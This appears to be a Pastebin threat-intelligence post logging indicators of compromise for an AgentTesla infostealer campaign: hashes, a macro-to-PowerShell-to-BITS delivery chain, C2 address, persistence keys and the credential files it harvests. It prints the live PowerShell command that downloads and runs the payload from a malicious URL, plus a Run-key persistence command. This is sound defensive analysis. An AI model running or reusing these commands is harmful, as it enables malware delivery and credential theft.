VRad

#agenttesla_090221

Feb 11th, 2021 (edited)
337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.71 KB | None | 0 0
  1. #IOC #OptiData #VR #AgentTesla #X97M #Downloader #Powershell #BITS #exfil587
  2.  
  3. https://pastebin.com/fN11F9Gq
  4.  
  5. previous_contact:
  6. 10/02/21 https://pastebin.com/9JXvM5ix
  7. 07/12/20 https://pastebin.com/20AVUqZ6
  8. 04/12/20 https://pastebin.com/PYFMBfkg
  9. 15/06/20 https://pastebin.com/pma5MQAW [!] InstallUtil.exe
  10. 12/06/20 https://pastebin.com/SKNts0Es
  11. 29/10/19 https://pastebin.com/RinpBPvy
  12. 03/09/19 https://pastebin.com/zhJvDz8M
  13. 09/01/19 https://pastebin.com/MdDfZDdb
  14. 16/10/18 https://pastebin.com/d5DxTRrB
  15. 04/10/18 https://pastebin.com/JYShuXn4
  16. 11/10/18 https://pastebin.com/bkCSvJvM
  17.  
  18. FAQ:
  19. https://radetskiy.wordpress.com/2020/06/15/ioc_agenttesla_150620/
  20. https://radetskiy.wordpress.com/2018/03/13/ioc_lnk_bits_130318/
  21.  
  22. attack_vector
  23. --------------
  24. email attach (xls) > macro > powershell > BITS > GET .pdf(EXE) > exfil to 198.54.126.101:587
  25.  
  26.  
  27. email_headers
  28. --------------
  29. n/a
  30.  
  31. # # # # # # # #
  32. files
  33. # # # # # # # #
  34.  
  35. SHA-256 3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c
  36. File name PO00004423.xls [ Microsoft Excel sheet ]
  37. File size 124.50 KB (127488 bytes)
  38.  
  39. SHA-256 eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0
  40. File name IMG_Scanned_6713.pdf [ .NET executable ]
  41. File size 926.61 KB (948848 bytes)
  42.  
  43. SHA-256 4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9
  44. File name InstallUtil.exe [ .NET executable ] - .NET Framework installation utility ! corelated with #Agenttesla_150620 https://pastebin.com/pma5MQAW
  45. File size 39.67 KB (40624 bytes)
  46.  
  47.  
  48. # # # # # # # #
  49. activity
  50. # # # # # # # #
  51. PL_SCR [BITS only!] http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf
  52.  
  53. C2 198.54.126.101:587
  54.  
  55.  
  56. netwrk [wireshark_filter: http.request.method==HEAD||http.request.method==GET||ssl||tcp.port==587]
  57. --------------
  58. 177.12.164.98 studioartarquitetura.com.br HEAD /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
  59. 177.12.164.98 studioartarquitetura.com.br GET /wp-includes/ID3/1/IMG_Scanned_6713.pdf HTTP/1.1 Microsoft BITS/7.5
  60.  
  61. 142.250.102.106 Client Hello
  62. 142.250.102.106 Application Data
  63.  
  64. 198.54.126.101 50809 → 587 [ACK] Seq=1 Ack=1 Win=64240 Len=0
  65. 198.54.126.101 C: AUTH login User: dHdva2V5c0Bub2JldHR3by54eXo=
  66. 198.54.126.101 C: MAIL FROM:<twokeys@nobettwo.xyz>
  67.  
  68.  
  69. comp
  70. --------------
  71. svchost.exe 3088 TCP 177.12.164.98 80 ESTABLISHED
  72. dvaurxb.exe 2820 TCP 142.250.102.106 443 ESTABLISHED
  73. pou.exe 3952 TCP 142.250.102.106 443 ESTABLISHED
  74. InstallUtil.exe 252 TCP 198.54.126.101 587 ESTABLISHED
  75.  
  76.  
  77. proc
  78. --------------
  79. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
  80. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Import-Module BitsTransfer; Start-BitsTransfer -Source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -Destination "$env:tmp\\dvaurxb.exe"; Invoke-Item "$env:tmp\\dvaurxb.exe"; exit
  81. C:\tmp\dvaurxb.exe
  82. C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
  83. C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "htwe" /t REG_SZ /d "C:\Users\operator\AppData\Roaming\pou.exe"
  84. C:\Users\operator\AppData\Roaming\pou.exe
  85. C:\tmp\InstallUtil.exe
  86.  
  87.  
  88. persist
  89. --------------
  90. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.02.2021 10:15
  91. htwe E8?:2<6?J;2AB@8 39;:94G29HA?3C:E52EJ>
  92. c:\users\operator\appdata\roaming\pou.exe 07.05.1979 4:21
  93.  
  94.  
  95. drop
  96. --------------
  97. %temp%\35618171.od
  98. %temp%\dvaurxb.exe
  99. %temp%\BITA9C9.tmp
  100. C:\Users\operator\AppData\Roaming\pou.exe
  101. %temp%\InstallUtil.exe
  102.  
  103.  
  104. # # # # # # # #
  105. additional info
  106. # # # # # # # #
  107.  
  108. Deobfuscated macro
  109. --------------
  110. import-module bitstransfer
  111. start-bitstransfer -source "http://studioartarquitetura.com.br/wp-includes/ID3/1/IMG_Scanned_6713.pdf" -destination $env:tmp
  112. dvaurxb.exe
  113. invoke-item $env:tmp
  114. dvaurxb.exe
  115. exit
  116.  
  117. !Steals private information from local Internet browsers
  118. --------------
  119. C:\Users\operator\AppData\Roaming\Opera Software\Opera Stable
  120. C:\Users\operator\AppData\Roaming\Mozilla\Firefox\profiles.ini
  121. C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\key4.db
  122. C:\Users\operator\AppData\Roaming\Mozilla\Firefox\Profiles\axdea46y.default\logins.json
  123. C:\Users\operator\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
  124. C:\Users\operator\AppData\Roaming\Comodo\IceDragon\profiles.ini
  125.  
  126. !Harvests credentials from local FTP client softwares
  127. --------------
  128. C:\Users\operator\AppData\Roaming\FTPGetter\servers.xml
  129. C:\Users\operator\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
  130. C:\Users\operator\AppData\Roaming\CoreFTP\sites.idx
  131.  
  132. !Harvests information related to installed mail clients
  133. --------------
  134. C:\Users\operator\AppData\Roaming\Postbox\profiles.ini
  135. C:\Users\operator\AppData\Roaming\eM Client
  136. C:\Users\operator\AppData\Roaming\Thunderbird\profiles.ini
  137. C:\Users\operator\AppData\Roaming\The Bat!
  138. C:\Users\operator\AppData\Roaming\Claws-mail\clawsrc
  139. C:\Users\operator\AppData\Roaming\Pocomail\accounts.ini
  140.  
  141. # # # # # # # #
  142. VT & Intezer
  143. # # # # # # # #
  144. https://www.virustotal.com/gui/file/3762daf78d104add5df228727793ceefd5794c142edd39913be21526ddaeda4c/details
  145. https://www.virustotal.com/gui/file/eebbc48f5c8cd470c709c229a4719e5c61ea6b1769b73b397bf110322ea92ae0/details
  146. https://analyze.intezer.com/analyses/4a4d284b-c91d-4657-8211-6046d723d0c3
  147. https://www.virustotal.com/gui/file/4c7ce63cd966e72e5d94f6dc8b0f82cec35b88b1a8d24305c52a7106cdad5ad9/details
  148. https://analyze.intezer.com/analyses/f1a2a705-c2e6-417f-b855-0eab53ce7973
  149.  
  150. VR
Add Comment
Please, Sign In to add comment